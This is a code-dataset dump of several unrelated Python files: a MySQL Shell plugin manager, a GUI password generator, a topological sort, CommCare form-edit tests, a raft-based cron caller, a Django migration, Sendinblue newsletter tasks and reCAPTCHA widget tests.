id stringlengths 1 265 | text stringlengths 6 5.19M | dataset_id stringclasses 7
values |
|---|---|---|
1713271 | # Copyright (c) 2020, Oracle and/or its affiliates.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License, version 2.0,
# as published by the Free Software Foundation.
#
# This program is also distributed with certain software (including
# but not limited to OpenSSL) that is licensed under separate terms, as
# designated in a particular file or component or in included license
# documentation. The authors of MySQL hereby grant you an additional
# permission to link the program and your derivative works with the
# separately licensed software that they have included with MySQL.
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See
# the GNU General Public License, version 2.0, for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""Plugin registration
This file is automatically loaded by the MySQL Shell at startup time.
It registers the plugin objects and then imports all sub-modules to
register the plugin object member functions.
"""
from mysqlsh.plugin_manager import plugin, plugin_function, VERSION
# Create a class representing the structure of the plugin and use the
# @register_plugin decorator to register it
@plugin
class plugins:
"""Plugin to manage MySQL Shell plugins
This global object exposes a list of shell extensions
to manage MySQL Shell plugins
Use plugins.about() to get more information about writing
MySQL Shell plugins.
"""
pass
@plugin_function("plugins.info")
def info():
"""Prints basic information about the plugin manager.
Returns:
None
"""
print(f"MySQL Shell Plugin Manager Version {VERSION}")
@plugin_function("plugins.version")
def version():
"""Returns the version number of the plugin manager.
Returns:
str
"""
return VERSION
@plugin_function("plugins.about")
def info():
"""Prints detailed information about the MySQL Shell plugin support.
Returns:
None
"""
print(
"""
The MySQL Shell allows extending its base functionality through the creation
of plugins.
A plugin is a folder containing the code that provides the functionality to
be made available on the MySQL Shell.
User defined plugins should be located at plugins folder at the following
paths:
- Windows: %AppData%\\MySQL\\mysqlsh\\plugins
- Others: ~/.mysqlsh/plugins
A plugin must contain an init file which is the entry point to load the
extension:
- init.js for plugins written in JavaScript.
- init.py for plugins written in Python.
On startup, the shell traverses the folders inside of the *plugins* folder
searching for the plugin init file. The init file will be loaded on the
corresponding context (JavaScript or Python).
Use Cases
The main use cases for MySQL Shell plugins include:
- Definition of shell reports to be used with the \\show and \\watch Shell
Commands.
- Definition of new Global Objects with user defined functionality.
For additional information on shell reports execute: \\? reports
For additional information on extension objects execute: \\? extension objects
"""
)
@plugin_function("plugins.list")
def list_plugins(**kwargs):
"""Lists all available MySQL Shell plugins.
This function will list all all available plugins in the registered
plugin repositories. To add a new plugin repository use the
plugins.repositories.add() function.
Args:
**kwargs: Optional parameters
Keyword Args:
return_formatted (bool): If set to true, a list object is returned.
interactive (bool): Whether user input is accepted
Returns:
None or a list of dicts representing the plugins
"""
import mysqlsh.plugin_manager.plugins as _plugins
return _plugins.list_plugins(**kwargs)
@plugin_function("plugins.install")
def install_plugin(name=None, **kwargs):
"""Installs a MySQL Shell plugin.
This function download and install a plugin
Args:
name (str): The name of the plugin.
**kwargs: Optional parameters
Keyword Args:
version (str): If specified, that specific version of the plugin will
be installed
force_install (bool): It set to true will first remove the plugin
if it already exists
return_object (bool): Whether to return the object
interactive (bool): Whether user input is accepted
printouts (bool): Whether information should be printed
raise_exceptions (bool): Whether exceptions are raised
Returns:
None or plugin information
"""
import mysqlsh.plugin_manager.plugins as _plugins
return _plugins.install_plugin(name, **kwargs)
@plugin_function("plugins.uninstall")
def uninstall_plugin(name=None, **kwargs):
"""Uninstalls a MySQL Shell plugin.
This function uninstall a plugin
Args:
name (str): The name of the plugin.
**kwargs: Optional parameters
Keyword Args:
interactive (bool): Whether user input is accepted
printouts (bool): Whether information should be printed
raise_exceptions (bool): Whether exceptions are raised
Returns:
None or plugin information
"""
import mysqlsh.plugin_manager.plugins as _plugins
return _plugins.uninstall_plugin(name, **kwargs)
@plugin_function("plugins.update")
def update_plugin(name=None, **kwargs):
"""Updates MySQL Shell plugins.
This function updates on or all plugins
Args:
name (str): The name of the plugin.
**kwargs: Optional parameters
Keyword Args:
interactive (bool): Whether user input is accepted
raise_exceptions (bool): Whether exceptions are raised
Returns:
None or plugin information
"""
import mysqlsh.plugin_manager.plugins as _plugins
return _plugins.update_plugin(name, **kwargs)
@plugin_function("plugins.details")
def plugin_details(name=None, **kwargs):
"""Gives detailed information about a MySQL Shell plugin.
Args:
name (str): The name of the plugin.
**kwargs: Optional parameters
Keyword Args:
interactive (bool): Whether user input is accepted
Returns:
None or plugin information
"""
import mysqlsh.plugin_manager.plugins as _plugins
return _plugins.plugin_details(name, **kwargs)
| StarcoderdataPython |
3266709 | from .llcp import LLCP
from .sample import NextReaction, NextReactionRecord, FirstReaction
from .runner import RunnerFSM
from .distributions import ExponentialDistribution, WeibullDistribution
from .distributions import GammaDistribution, UniformDistribution
from .distributions import PiecewiseLinearDistribution, PiecewiseConstantDistribution
from .point_process import poisson_point_process_2D, thomas_point_process_2D
| StarcoderdataPython |
1659634 | ###################################
# DRH Health - Password generator #
# Created by <NAME> - IT #
###################################
# Imports
import random, array, webbrowser
import PySimpleGUI as sg
# PySimpleGUI theme
#sg.theme('DarkGrey12')
# Create password pattern
def create_password(pass_length):
MAX_LEN = pass_length
DIGITS = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']
LOWCASE_CHARACTERS = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h',
'i', 'j', 'k', 'm', 'n', 'o', 'p', 'q',
'r', 's', 't', 'u', 'v', 'w', 'x', 'y',
'z']
UPCASE_CHARACTERS = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H',
'I', 'J', 'K', 'M', 'N', 'O', 'p', 'Q',
'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y',
'Z']
SYMBOLS = ['@', '#', '$', '%', '=', ':', '?', '.', '/', '|', '~', '>',
'*', '(', ')', '<']
# Combine all character arrays into a single array
combined_list = DIGITS + UPCASE_CHARACTERS + LOWCASE_CHARACTERS + SYMBOLS
# randomly select at least one character from each character set above
rand_digit = random.choice(DIGITS)
rand_upper = random.choice(UPCASE_CHARACTERS)
rand_lower = random.choice(LOWCASE_CHARACTERS)
rand_symbol = random.choice(SYMBOLS)
# Generate a temporary set of character strings
temp_pass = rand_digit + rand_upper + rand_lower + rand_symbol
# Randomly combine and shuffle the temp pass
for x in range(MAX_LEN - 4):
temp_pass = temp_pass + random.choice(combined_list)
temp_pass_list = array.array('u', temp_pass)
random.shuffle(temp_pass_list)
# Instantiate an empty password variable
password = ''
# Generate the new password pattern by looping through each random character in temp_pass
for x in temp_pass_list:
password = password + x
# Retrun instance of password
return password
# Main entry point
def main():
# Frame layout
frame_layout = [
[sg.Text('Choose the amount of characters to generate (16 is the default recommended size):')],
[sg.Slider(range=(10,200), default_value=16, size=(55,10), orientation='horizontal', key='-SLIDER-')]
]
# Layout
layout = [
[sg.Text('This tool can generate secure passwords starting from 10 to 200 characters in length.')],
[sg.Frame('Password options', frame_layout)],
[sg.Button('Generate password', size=(30,1), key='-GENERATE-'), sg.Button('Copy password', size=(30,1), key='-COPY-')],
[sg.Multiline(size=(72,3), autoscroll=True, no_scrollbar=True, key='-PASSWORD-')],
[sg.Text('Check the password strength at:'), sg.Text('https://www.security.org/how-secure-is-my-password', enable_events=True, text_color='blue', key='-LINK-')]
]
# Create window pattern
window = sg.Window('DRH Health - Password Generator', layout)
# Loop through event handlers
while True:
event, values = window.read()
if event == sg.WIN_CLOSED:
break
if event == '-LINK-':
webbrowser.open(r'https://www.security.org/how-secure-is-my-password')
if event == '-GENERATE-' and values['-SLIDER-']:
value = int(values['-SLIDER-'])
pass_result = create_password(value)
window['-PASSWORD-'].update(pass_result)
window['-GENERATE-'].update('Generate another')
if event == '-COPY-':
try:
text = window['-PASSWORD-'].Widget.selection_get()
window.TKroot.clipboard_clear()
window.TKroot.clipboard_append(text)
window['-COPY-'].update('Password copied to clipboard!')
except:
window['-COPY-'].update('No password selected!')
# Kill the window instance
window.close()
# Set environment vars
if __name__ == '__main__':
main() | StarcoderdataPython |
1695598 | from .exchangeability import exch_test
from .goodness_of_fit import gof_copula
from .radial_symmetry import rad_sym_test
| StarcoderdataPython |
1726407 | <reponame>Pysics/Algorithm
from __future__ import annotations
import copy
import networkx
def kahn_algorithm(graph: networkx.DiGraph) -> list:
_graph = copy.deepcopy(graph)
sequence = []
vertices = [vertex for vertex in _graph.nodes if _graph.in_degree(vertex) == 0]
while len(vertices) > 0:
vertex = vertices[0]
vertices.remove(vertex)
sequence.append(vertex)
neighbours = list(_graph.neighbors(vertex))
for node in neighbours:
_graph.remove_edge(vertex, node)
if _graph.in_degree(node) == 0:
vertices.append(node)
return sequence
| StarcoderdataPython |
1784592 | from setuptools import setup, find_packages
setup(
name='simple_pytimer',
version='0.0.6',
license='',
packages=find_packages()
)
| StarcoderdataPython |
90774 | <gh_stars>0
from datetime import datetime, timedelta
import os
import uuid
from django.test import TestCase
from mock import MagicMock
from couchdbkit import RequestFailed
from casexml.apps.case.mock import CaseBlock
from casexml.apps.case.xml import V2
from corehq.apps.hqcase.utils import submit_case_blocks
from corehq.apps.receiverwrapper import submit_form_locally
from couchforms.models import XFormInstance, \
UnfinishedSubmissionStub
from corehq.form_processor.interfaces import FormProcessorInterface
class EditFormTest(TestCase):
ID = '7H46J37FGH3'
domain = 'test-form-edits'
def tearDown(self):
FormProcessorInterface.delete_all_xforms()
def _get_files(self):
first_file = os.path.join(os.path.dirname(__file__), "data", "deprecation", "original.xml")
edit_file = os.path.join(os.path.dirname(__file__), "data", "deprecation", "edit.xml")
with open(first_file, "rb") as f:
xml_data1 = f.read()
with open(edit_file, "rb") as f:
xml_data2 = f.read()
return xml_data1, xml_data2
def test_basic_edit(self):
xml_data1, xml_data2 = self._get_files()
yesterday = datetime.utcnow() - timedelta(days=1)
xform = FormProcessorInterface.post_xform(xml_data1)
self.assertEqual(self.ID, xform.id)
self.assertEqual("XFormInstance", xform.doc_type)
self.assertEqual("", xform.form['vitals']['height'])
self.assertEqual("other", xform.form['assessment']['categories'])
# post form back in time to simulate an edit
FormProcessorInterface.update_properties(
xform,
domain=self.domain,
received_on=yesterday,
)
xform = FormProcessorInterface.post_xform(xml_data2, domain=self.domain)
self.assertEqual(self.ID, xform.id)
self.assertEqual("XFormInstance", xform.doc_type)
self.assertEqual("100", xform.form['vitals']['height'])
self.assertEqual("Edited Baby!", xform.form['assessment']['categories'])
[deprecated_xform] = FormProcessorInterface.get_by_doc_type(self.domain, 'XFormDeprecated')
self.assertEqual(self.ID, deprecated_xform.orig_id)
self.assertNotEqual(self.ID, deprecated_xform.id)
self.assertEqual('XFormDeprecated', deprecated_xform.doc_type)
self.assertEqual("", deprecated_xform.form['vitals']['height'])
self.assertEqual("other", deprecated_xform.form['assessment']['categories'])
self.assertEqual(xform.received_on, deprecated_xform.received_on)
self.assertEqual(xform.deprecated_form_id, deprecated_xform.id)
self.assertTrue(xform.edited_on > deprecated_xform.received_on)
self.assertEqual(
FormProcessorInterface.get_attachment(deprecated_xform.id, 'form.xml'),
xml_data1
)
self.assertEqual(FormProcessorInterface.get_attachment(self.ID, 'form.xml'), xml_data2)
def test_broken_save(self):
"""
Test that if the second form submission terminates unexpectedly
and the main form isn't saved, then there are no side effects
such as the original having been marked as deprecated.
"""
class BorkDB(object):
"""context manager for making a db's bulk_save temporarily fail"""
def __init__(self, db):
self.old = {}
self.db = db
def __enter__(self):
self.old['bulk_save'] = self.db.bulk_save
self.db.bulk_save = MagicMock(name='bulk_save',
side_effect=RequestFailed())
def __exit__(self, exc_type, exc_val, exc_tb):
self.db.bulk_save = self.old['bulk_save']
xforms = FormProcessorInterface.get_by_doc_type(self.domain, 'XFormInstance')
self.assertEqual(len(xforms), 0)
xml_data1, xml_data2 = self._get_files()
submit_form_locally(xml_data1, self.domain)
xform = FormProcessorInterface.get_xform(self.ID)
self.assertEqual(self.ID, xform.id)
self.assertEqual("XFormInstance", xform.doc_type)
self.assertEqual(self.domain, xform.domain)
self.assertEqual(
UnfinishedSubmissionStub.objects.filter(xform_id=self.ID).count(),
0
)
# This seems like a couch specific test util. Will likely need postgres test utils
with BorkDB(XFormInstance.get_db()):
with self.assertRaises(RequestFailed):
submit_form_locally(xml_data2, self.domain)
# it didn't go through, so make sure there are no edits still
xforms = FormProcessorInterface.get_by_doc_type(self.domain, 'XFormDeprecated')
self.assertEqual(len(xforms), 0)
xform = FormProcessorInterface.get_xform(self.ID)
self.assertIsNotNone(xform)
self.assertEqual(
UnfinishedSubmissionStub.objects.filter(xform_id=self.ID,
saved=False).count(),
1
)
self.assertEqual(
UnfinishedSubmissionStub.objects.filter(xform_id=self.ID).count(),
1
)
def test_case_management(self):
form_id = uuid.uuid4().hex
case_id = uuid.uuid4().hex
owner_id = uuid.uuid4().hex
case_block = CaseBlock(
create=True,
case_id=case_id,
case_type='person',
owner_id=owner_id,
update={
'property': 'original value'
}
).as_string()
submit_case_blocks(case_block, domain=self.domain, form_id=form_id)
# validate some assumptions
case = FormProcessorInterface.get_case(case_id)
self.assertEqual(case.type, 'person')
self.assertEqual(case.property, 'original value')
self.assertEqual([form_id], case.xform_ids)
self.assertEqual(2, len(case.actions))
for a in case.actions:
self.assertEqual(form_id, a.xform_id)
# submit a new form with a different case update
case_block = CaseBlock(
create=True,
case_id=case_id,
case_type='newtype',
owner_id=owner_id,
update={
'property': 'edited value'
}
).as_string()
submit_case_blocks(case_block, domain=self.domain, form_id=form_id)
case = FormProcessorInterface.get_case(case_id)
self.assertEqual(case.type, 'newtype')
self.assertEqual(case.property, 'edited value')
self.assertEqual([form_id], case.xform_ids)
self.assertEqual(2, len(case.actions))
for a in case.actions:
self.assertEqual(form_id, a.xform_id)
def test_second_edit_fails(self):
form_id = uuid.uuid4().hex
case_id = uuid.uuid4().hex
case_block = CaseBlock(
create=True,
case_id=case_id,
case_type='person',
).as_string()
submit_case_blocks(case_block, domain=self.domain, form_id=form_id)
# submit an edit form with a bad case update (for example a bad ID)
case_block = CaseBlock(
create=True,
case_id='',
case_type='person',
).as_string()
submit_case_blocks(case_block, domain=self.domain, form_id=form_id)
xform = FormProcessorInterface.get_xform(form_id)
self.assertEqual('XFormError', xform.doc_type)
deprecated_xform = FormProcessorInterface.get_xform(xform.deprecated_form_id)
self.assertEqual('XFormDeprecated', deprecated_xform.doc_type)
def test_case_management_ordering(self):
case_id = uuid.uuid4().hex
owner_id = uuid.uuid4().hex
# create a case
case_block = CaseBlock(
create=True,
case_id=case_id,
case_type='person',
owner_id=owner_id,
).as_string()
create_form_id = submit_case_blocks(case_block, domain=self.domain)
# validate that worked
case = FormProcessorInterface.get_case(case_id)
self.assertEqual([create_form_id], case.xform_ids)
self.assertEqual([create_form_id], [a.xform_id for a in case.actions])
for a in case.actions:
self.assertEqual(create_form_id, a.xform_id)
edit_date = datetime.utcnow()
# set some property value
case_block = CaseBlock(
create=False,
case_id=case_id,
date_modified=edit_date,
update={
'property': 'first value',
}
).as_string()
edit_form_id = submit_case_blocks(case_block, domain=self.domain)
# validate that worked
case = FormProcessorInterface.get_case(case_id)
self.assertEqual(case.property, 'first value')
self.assertEqual([create_form_id, edit_form_id], case.xform_ids)
self.assertEqual([create_form_id, edit_form_id], [a.xform_id for a in case.actions])
# submit a second (new) form updating the value
case_block = CaseBlock(
create=False,
case_id=case_id,
update={
'property': 'final value',
}
).as_string()
second_edit_form_id = submit_case_blocks(case_block, domain=self.domain)
# validate that worked
case = FormProcessorInterface.get_case(case_id)
self.assertEqual(case.property, 'final value')
self.assertEqual([create_form_id, edit_form_id, second_edit_form_id], case.xform_ids)
self.assertEqual([create_form_id, edit_form_id, second_edit_form_id], [a.xform_id for a in
case.actions])
# deprecate the middle edit
case_block = CaseBlock(
create=False,
case_id=case_id,
date_modified=edit_date, # need to use the previous edit date for action sort comparisons
update={
'property': 'edited value',
'added_property': 'added value',
}
).as_string()
submit_case_blocks(case_block, domain=self.domain, form_id=edit_form_id)
# ensure that the middle edit stays in the right place and is applied
# before the final one
case = FormProcessorInterface.get_case(case_id)
self.assertEqual(case.property, 'final value')
self.assertEqual(case.added_property, 'added value')
self.assertEqual([create_form_id, edit_form_id, second_edit_form_id], case.xform_ids)
self.assertEqual([create_form_id, edit_form_id, second_edit_form_id], [a.xform_id for a in
case.actions])
| StarcoderdataPython |
3220744 | <reponame>zhebrak/beatle
import aiohttp
import argparse
import asyncio
import functools
import json
import hmac
import logging
import pytz
import raftos
import time
from configparser import ConfigParser, NoSectionError, NoOptionError
from datetime import datetime, timedelta
from logging.handlers import SysLogHandler
from crontab import CronTab
logging.basicConfig(
filename='/var/log/beatle/beatle.log',
format="[%(asctime)s] %(levelname)s %(message)s",
level=logging.INFO
)
logger = logging.getLogger('beatle')
DEFAULT_CONFIGURATION = {
'LOOP_TIMEOUT': 10,
'UPDATE_EVERY': 600,
'TIMEOUT': 5,
'TIME_ZONE': 'Europe/Moscow'
}
class Beatle:
def __init__(self, config_path, beatle_id):
self.id = beatle_id
self.read_config(config_path)
self.init_logger()
def config_get(self, section, option, default=None):
try:
return self.config.get(section, option)
except (NoSectionError, NoOptionError):
return default
def read_config(self, config_path):
self.config = ConfigParser()
self.config.read(config_path)
self.loop_timeout = int(self.config_get('beatle', 'LOOP_TIMEOUT', 10))
self.projects = []
for section in self.config.sections():
if section != 'beatle':
configuration = DEFAULT_CONFIGURATION.copy()
configuration.update({
'NAME': section,
'KEY': self.config_get(section, 'KEY'),
'URL': self.config_get(section, 'URL'),
'UPDATE_EVERY': self.config_get('beatle', 'UPDATE_EVERY', 600),
'TIMEOUT': self.config_get('beatle', 'TIMEOUT', 5),
'TIME_ZONE': self.config_get('beatle', 'TIME_ZONE', 'Europe/Moscow'),
'LOOP_TIMEOUT': self.loop_timeout
})
self.projects.append(Project(self, configuration))
def init_logger(self):
logger.setLevel(logging.DEBUG)
facility = self.config_get('logging', 'facility', 'LOG_USER')
handler = SysLogHandler(facility=getattr(SysLogHandler, facility))
logger.addHandler(handler)
def on_leader(self):
logger.info('{} is leader'.format(self.id))
async def run(self):
"""Run event loop"""
loop = asyncio.get_event_loop()
while True:
await raftos.wait_until_leader(self.id)
for project in self.projects:
asyncio.ensure_future(project.call())
await asyncio.sleep(self.loop_timeout)
class Project:
def __init__(self, beatle, configuration):
self.beatle = beatle
self.name = configuration.get('NAME')
self.key = configuration.get('KEY')
self.url = configuration.get('URL')
self.timezone = configuration.get('TIME_ZOME')
self.update_every = int(configuration.get('UPDATE_EVERY'))
self.timeout = int(configuration.get('TIMEOUT'))
self.loop_timeout = int(configuration.get('LOOP_TIMEOUT'))
self.last_update = None
self.config = {}
self.tasks = {}
async def get_config(self):
"""Return config from projects' HTTP endpoint"""
if self.config_have_to_be_updated:
self.config = await self._request('get') or self.config or {}
self.tasks = {
task: CronTab(cron_string)
for task, cron_string in self.config.get('TASKS', {}).items()
}
self.timezone = self.config.get('TIME_ZONE') or self.timezone
self.timeout = self.config.get('TIMEOUT') or self.timeout
self.update_every = self.config.get('UPDATE_EVERY') or self.update_every
self.last_update = datetime.now()
@property
def timezone_aware_now(self):
try:
return datetime.now(pytz.timezone(self.timezone))
except pytz.exceptions.UnknownTimeZoneError:
logger.exception('Wrong timezone provided for {}'.format(self.name))
finally:
return datetime.now()
@property
def config_have_to_be_updated(self):
if self.last_update is None:
return True
return self.last_update < datetime.now() - timedelta(self.update_every)
async def call(self):
"""POST to HTTP endpoint if needed"""
await self.get_config()
for task_name, cron in self.tasks.items():
time_left = cron.next(now=self.timezone_aware_now)
if time_left < self.loop_timeout:
asyncio.ensure_future(
self._call_later(
time_left,
self._request('post', data={'TASK': task_name})
)
)
@staticmethod
async def _call_later(time_left, coroutine):
await asyncio.sleep(time_left)
await coroutine
async def _request(self, method, data=None, params=None):
if params is None:
params = {}
params.update({'SIGNATURE': self._get_signature(data)})
start = time.time()
result = None
async with aiohttp.ClientSession() as session:
request = getattr(session, method)
async with request(self.url, data=data, params=params, timeout=self.timeout) as r:
if r.status == 200:
result = await r.json()
log_map = {
'URL': self.url,
'Data': json.dumps(data),
'Time': str(time.time() - start),
'Status': str(r.status),
'Response': json.dumps(result)
}
message = '\n'.join([': '.join([key, value]) for key, value in log_map.items()])
logger.info('\n' + message + '\n')
return result
def _get_signature(self, params=None):
if params is None:
params = {}
msg = ''.join(map(str, sorted(params.values()))).encode()
return hmac.new(self.key.encode(), msg=msg).hexdigest()
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--conf')
parser.add_argument('--node')
parser.add_argument('--cluster')
args = parser.parse_args()
cluster = ['127.0.0.1:{}'.format(port) for port in args.cluster.split()]
node = '127.0.0.1:{}'.format(args.node)
beatle = Beatle(config_path=args.conf, beatle_id=node)
logger.info('Starting beatle node: {}'.format(node))
loop = asyncio.get_event_loop()
loop.create_task(raftos.register(node, cluster=cluster))
raftos.configure({
'log_path': '/var/log/beatle/',
'serializer': raftos.serializers.JSONSerializer,
'on_leader': beatle.on_leader
})
loop.run_until_complete(beatle.run())
| StarcoderdataPython |
23058 | # Generated by Django 3.0.2 on 2020-01-31 20:33
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('collections', '0002_auto_20200109_1348'),
]
operations = [
migrations.AlterField(
model_name='collection',
name='comment',
field=models.CharField(help_text='Comment for collection.', max_length=256, verbose_name='Comment'),
),
migrations.AlterField(
model_name='collection',
name='expired_on',
field=models.DateTimeField(help_text='An expiration date of collection.', verbose_name='An expiration date'),
),
migrations.AlterField(
model_name='collection',
name='public',
field=models.BooleanField(default=False, help_text='Make public.', verbose_name='Public'),
),
migrations.AlterField(
model_name='collection',
name='query',
field=models.CharField(help_text='Query for collection.', max_length=256, verbose_name='Query'),
),
]
| StarcoderdataPython |
38796 | <filename>ecosante/newsletter/tasks/import_in_sb.py
from flask import current_app
from datetime import datetime
from uuid import uuid4
import os
from flask.helpers import url_for
import sib_api_v3_sdk
from sib_api_v3_sdk.rest import ApiException
from ecosante.newsletter.models import Newsletter, NewsletterDB, Inscription
from ecosante.extensions import db, sib, celery
from ecosante.utils import send_log_mail
def get_all_contacts(limit=100):
contacts_api = sib_api_v3_sdk.ContactsApi(sib)
contacts = []
offset = 0
while True:
result = contacts_api.get_contacts(limit=100, offset=offset)
contacts += result.contacts
if len(result.contacts) < limit:
break
offset += limit
return contacts
def get_blacklisted_contacts():
return [c for c in get_all_contacts() if c['emailBlacklisted']]
def deactivate_contacts():
for contact in get_blacklisted_contacts():
db_contact = Inscription.active_query().filter(Inscription.mail==contact['email']).first()
if not db_contact or not db_contact.is_active:
continue
db_contact.unsubscribe()
def import_and_send(task, seed, preferred_reco, remove_reco, only_to, force_send=False):
task.update_state(
state='STARTED',
meta={
"progress": 0,
"details": "Prise en compte de la désincription des membres"
}
)
deactivate_contacts()
task.update_state(
state='STARTED',
meta={
"progress": 0,
"details": "Suppression des anciennes listes"
}
)
list_ids_to_delete = get_lists_ids_to_delete()
contacts_api = sib_api_v3_sdk.ContactsApi(sib)
for i, list_id in enumerate(list_ids_to_delete, 1):
contacts_api.delete_list(list_id)
task.update_state(
state='STARTED',
meta={
"progress": 0,
"details": f"Suppression des anciennes listes ({i}/{len(list_ids_to_delete)})"
}
)
task.update_state(
state='STARTED',
meta={
"progress": 0,
"details": "Constitution de la liste"
}
)
newsletters = list(
map(
NewsletterDB,
Newsletter.export(
preferred_reco=preferred_reco,
user_seed=seed,
remove_reco=remove_reco,
only_to=only_to
)
)
)
if current_app.config['ENV'] == 'production':
db.session.add_all(newsletters)
db.session.commit()
task.update_state(
state='STARTED',
meta={
"progress" :0,
"details": "Construction des listes SIB d'envoi"
}
)
result = import_(task, newsletters, force_send, 2)
result['progress'] = 100
if current_app.config['ENV'] == 'production':
db.session.commit()
return result
def send(campaign_id, test=False):
if current_app.config['ENV'] == 'production' or test:
send_email_api = sib_api_v3_sdk.EmailCampaignsApi(sib)
send_email_api.send_email_campaign_now(campaign_id=campaign_id)
def import_(task, newsletters, force_send=False, overhead=0, test=False, mail_list_id=None):
mail_list_id_set = mail_list_id is not None
errors = []
now = datetime.now()
total_nb_requests = 4 + len(newsletters) + overhead
nb_requests = 0
if mail_list_id == None:
lists_api = sib_api_v3_sdk.ListsApi(sib)
r = lists_api.create_list(
sib_api_v3_sdk.CreateList(
name=f'{now} - mail',
folder_id=int(os.getenv('SIB_FOLDERID', 5)) if not test else int(os.getenv('SIB_FOLDERID', 1653))
)
)
mail_list_id = r.id
nb_requests += 1
if task:
task.update_state(
state='STARTED',
meta={
"progress": (nb_requests/total_nb_requests)*100,
"details": f"Création de la liste"
}
)
for i, nl in enumerate(newsletters):
if nl.label is None and not force_send:
errors.append({
"type": "no_air_quality",
"nl_id": nl.id,
"region": nl.inscription.commune.departement.region.nom,
"ville": nl.inscription.commune.nom,
"insee": nl.inscription.commune.insee
})
current_app.logger.error(f"No qai for {nl.inscription.mail}")
elif not nl.something_to_show and force_send:
errors.append({
"type": "nothing_to_show",
"nl_id": nl.id,
"region": nl.inscription.commune.departement.region.nom,
"ville": nl.inscription.commune.nom,
"insee": nl.inscription.commune.insee
})
current_app.logger.error(f"Nothing to show for {nl.inscription.mail}")
else:
if current_app.config['ENV'] == 'production' and not mail_list_id_set:
nl.mail_list_id = mail_list_id
db.session.add(nl)
if i % 100 == 0:
db.session.commit()
if current_app.config['ENV'] == 'production' or test:
db.session.commit()
contact_api = sib_api_v3_sdk.ContactsApi(sib)
request_contact_import = sib_api_v3_sdk.RequestContactImport()
request_contact_import.list_ids = [mail_list_id]
request_contact_import.email_blacklist = False
request_contact_import.sms_blacklist = False
request_contact_import.update_existing_contacts = True
request_contact_import.empty_contacts_attributes = True
request_contact_import.file_url = url_for(
'newsletter.export',
secret_slug=os.getenv("CAPABILITY_ADMIN_TOKEN"),
mail_list_id=mail_list_id,
_external=True,
_scheme='https'
)
request_contact_import.notify_url = url_for(
'newsletter.send_campaign',
secret_slug=os.getenv("CAPABILITY_ADMIN_TOKEN"),
now=now,
mail_list_id=mail_list_id,
_external=True,
_scheme='https'
)
current_app.logger.debug("About to send newsletter with params")
current_app.logger.debug(request_contact_import)
try:
contact_api.import_contacts(request_contact_import)
current_app.logger.debug("Newsletter sent")
except ApiException as e:
current_app.logger.error("Exception when calling ContactsApi->import_contacts: %s\n" % e)
return {
"state": "STARTED",
"progress": (nb_requests/total_nb_requests)*100,
"details": "Terminé",
"errors": errors
}
def create_campaign(now, mail_list_id, test=False):
if current_app.config['ENV'] == 'production' or test:
template_id = int(os.getenv('SIB_EMAIL_TEMPLATE_ID', 526))
email_campaign_api = sib_api_v3_sdk.EmailCampaignsApi(sib)
transactional_api = sib_api_v3_sdk.TransactionalEmailsApi(sib)
template = transactional_api.get_smtp_template(int(template_id))
r = email_campaign_api.create_email_campaign(
sib_api_v3_sdk.CreateEmailCampaign(
sender=sib_api_v3_sdk.CreateEmailCampaignSender(
email=template.sender.email,
name=template.sender.name
),
name = f'{now}',
template_id = template_id,
subject = template.subject,
reply_to = "<EMAIL>",
recipients = sib_api_v3_sdk.CreateEmailCampaignRecipients(
list_ids=[mail_list_id]
),
header="Aujourd'hui, la qualité de l'air autour de chez vous est…",
tag='newsletter' if not test else 'test_newsletter'
)
)
email_campaign_id = r.id
else:
email_campaign_id = 0
return email_campaign_id
def format_errors(errors):
if not errors:
return ''
r = ''
r2 = ''
regions = dict()
errors_types = {
"no_air_quality": "Pas de qualité de l’air",
"nothing_to_show": "Aucune donnée à montrer"
}
for error in errors:
r += f"{errors_types.get(error['type'], error['type'])} pour la ville de {error['ville']} ({error['insee']}) région: '{error['region']}'\n"
r2 += f"{error['ville']}, {error['insee']}, {error['region']}\n"
regions.setdefault(error['region'], 0)
regions[error['region']] += 1
r += '\n'
for region, i in regions.items():
r += f'La région {region} a eu {i} erreurs\n'
r += '\n'
r += r2
return r
@celery.task(bind=True)
def import_send_and_report(self, only_to=None, force_send=False, report=False):
current_app.logger.error("Début !")
new_task_id = str(uuid4())
self.update_state(
state='STARTED',
meta={
"progress": 0,
"details": f"Lancement de la tache: '{new_task_id}'",
}
)
result = import_and_send(self, str(uuid4()), None, [], only_to, force_send)
if report:
errors = format_errors(result['errors'])
body = """
Bonjour,
Il n’y a pas eu d’erreur lors de l’envoi de la newsletter
Bonne journée !
""" if not errors else f"""
Bonjour,
Il y a eu des erreurs lors de l’envoi de la newsletter :
{errors}
Bonne journée
"""
send_log_mail("Rapport d’envoi de la newsletter", body, name="Rapport recosante", email="<EMAIL>")
self.update_state(
state='SUCESS',
meta={
"progress": 100,
"details": f"Fin",
}
)
return result
def get_lists_ids_to_delete():
api_instance = sib_api_v3_sdk.ContactsApi(sib)
offset = 10
api_response = api_instance.get_lists(limit=10, offset=offset)
ids = []
while True:
ids = ids + [r['id'] for r in api_response.lists]
if not api_response.lists:
break
offset += 10
api_response = api_instance.get_lists(limit=10, offset=offset)
return ids | StarcoderdataPython |
3328005 | <filename>tests/captcha/test_widgets.py<gh_stars>10-100
from unittest import TestCase
from django.utils.safestring import SafeData
from antispam.captcha.widgets import ReCAPTCHA, InvisibleReCAPTCHA
class ReCAPTCHATests(TestCase):
def setUp(self):
self.widget = ReCAPTCHA(sitekey='mysitekey')
def test_render_return_html(self):
html = self.widget.render('captcha', '1234')
self.assertIsInstance(html, SafeData)
def test_render(self):
html = self.widget.render('captcha', '1234')
self.assertIn('g-recaptcha', html)
def test_get_value_from_datadict(self):
value = self.widget.value_from_datadict({
'g-recaptcha-response': 'my-response'
}, {}, 'recaptcha')
self.assertEqual('my-response', value)
class InvisibleReCAPTCHATests(ReCAPTCHATests):
def setUp(self):
self.widget = InvisibleReCAPTCHA(sitekey='mysitekey')
| StarcoderdataPython |
